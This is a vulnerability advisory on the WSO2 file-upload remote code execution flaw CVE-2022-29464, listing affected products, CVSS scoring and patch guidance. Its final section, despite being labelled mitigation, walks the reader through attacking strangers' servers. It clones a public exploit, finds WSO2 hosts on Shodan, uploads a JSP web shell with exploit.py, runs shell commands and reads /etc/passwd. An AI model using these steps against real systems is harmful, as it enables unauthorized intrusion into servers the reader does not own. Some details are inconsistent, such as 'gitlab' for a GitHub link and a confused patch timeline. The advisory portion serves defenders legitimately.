WSO2 RCE (CVE-2022-29464)

Introduction:

Since April, we have seen vulnerability CVE-2022-29464 being used in the wild to exploit arbitrary remote code execution through unfettered file uploads (RCE). The security flaw, which was disclosed and patched in April, has a severity rating of Critical (9.8) and is present in several WSO2 products.

When left unpatched, it can be exploited to infiltrate networks because it doesn't need user interaction or administrator rights to be abused.

Vulnerability abuse:

A single malicious Jakarta Server Pages (.JSP, formerly JavaServer Pages) file can be published under places such as /Install Path for WSO2

Product>/repository/deployment/server/webapps/authenticationendpoint/>, as we saw the installation of web shells exploiting the gap.

It is noteworthy that many of the discovered attacks are quite persistent in the current PoC implementations, despite the fact that the PoC indicates the potential of inserting files in other paths of /authenticationendpoint/.

But after further investigation, we discovered more uploaded and set up web application resource (.WAR) files in additional places where the web shells were set up, most likely as a result of the activation of the Metasploit module.

In the user context, the legitimate Java application server function extracts Payload.class from this .war file:

● /<Install Path for WSO2 Product>/repository/deployment/server/webapps/{5 letters   
  like
  HcTnA}.war
● /<Install Path for WSO2 Product>/repository/deployment/server/webapps/{5 letters   
  like
  HcTnA}/WEB-INF/classes/metasploit/Payload.class

We discovered the web shell installation for the location /authenticationendpoint/ and others occuring in at least four of the seven products affected by using either.JSP or.WAR files. This site appears to be a common location among WSO2 products.

Product:

This vulnerability allowed unauthenticated and remote attackers to execute arbitrary code in the following products:

• API Manager

• Identity Server

• Identity Server Analytics

• Identity Server as Key Manager

• Enterprise Integrator

Published Date:

04/01/2022

Impact:

This vulnerability can lead to Remote Code Execution (RCE)

Solution:

• wso2-upgrade-latest

Execution Summary:

On April 18, a user by the name of Orange Tsai reported a vulnerability in a WSO2 product. The vulnerability was later assigned a CVE number and patched.

A proof of the attack was uploaded on GitHub on April 20 by a user going by the handle "hakkivi," and the following day, we saw vulnerabilities being used against the vulnerable environments. The impacted environment's Metasploit module became accessible around a week later.

WSO2 API Manager 2.2.0 and later, Identity Server 5.2.0 and later, Identity Server Analytics 5.4.0 to 5.6.0, Identity Server as Key Manager 5.3.0 and later, Open Banking AM 1.4.0 and later, and Enterprise Integrator 6.2.0 and later are specifically impacted by the gap.

Affected Versions:

Product Versions

• WSO2 API Manager 2.2.0 and above

• WSO2 Identity Server 5.2.0 and above

• WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0

• WSO2 Identity Server as Key Manager 5.3.0 and above

• WSO2 Enterprise Integrator 6.2.0 and above

• WSO2 Open Banking AM 1.4.0 and above

• WSO2 Open Banking KM 1.4.0 and above

CVSS v3:

• Score 9.8 Critical

• Attack Vector Network

• Attack Complexity Low

• Privileges Required None

• User Interaction None

• Confidentiality High

• Integrity High

• Availability High

Recommendations:

Recommendation #1: Apply Applicable Security Patch

Patches were released for all supported product versions in February 2022.

Use WSO2 Updates to install the necessary fix if you are a WSO2 customer with a Support Subscription.

Apply the required security patch from one of the following GitHub repositories if you do not have a Support Subscription or are using an end-of-life product:

● https://github.com/wso2/carbon-kernel/pull/3152
● https://github.com/wso2/carbon-identity-framework/pull/3864
● https://github.com/wso2-extensions/identity-carbon-auth-rest/pull/167

Recommendation #2: Apply Applicable Temporary Workarounds

Apply the temporary mitigation procedures recommended by WSO2 here if it is not possible to apply the most recent security patch.

Test cases for common use cases were used to evaluate the workarounds.

However, we advise testing changes in a development environment before releasing to production in accordance with best practises for change management.

Technical Analysis / Exploits:

1. For starting mitigation, first you need to download a vulnerable exploit

script from gitlab. Use the below command to download complete repositories

in your local system:

```
git clone https://github.com/devengpk/CVE-2022-29464.git

```   

2. Then after downloading complete repositories, use the below command to

change your directory to the exploit repository:

```
cd CVE-2022-29464

```

After changing the directory, before starting this exploit you have to find any publicly available WSO2 server (if you don’t have already founded target server) Use the below URL to open shodan.

https://www.shodan.io/dashboard

Now in Shodan search bar, search the specific WSO2 target:

```
WSO2 port:9443

```

3. After successfully founding any WSO2 server, lets use python exploit to

create an exploitable file.

Use the below command to create a file.

```
python3 exploit.py https://<founded server ip:port>/ js.jsp

```

4. Now copy the output of above command and paste it in the browser

5. After opening the above command output in the browser, a search bar will

appear to run bash shell commands.

6. Type your desired commands in the search bar and press Run button

After running the ls command, output will be shown as below

7. Use below command to find all users

```
cat /etc/passwd

```

Output will be the same as shown below.

Reference:

● https://github.com/devengpk/CVE-2022-29464.git
● https://nvd.nist.gov/vuln/detail/CVE-2022-29464
● https://www.trendmicro.com/en_us/research/22/e/patch-your-wso2-cve-2022-29464-
exploited-to-install-linux-compatible-cobalt-strike-beacons-other-malware.html
● https://www.rapid7.com/db/vulnerabilities/wso2-2021-1738-cve-2022-29464/

#CVE-2022-29464

Vulnerability CVE-2022-29464 being used in the wild to exploit arbitrary remote code execution through unfettered file uploads (RCE).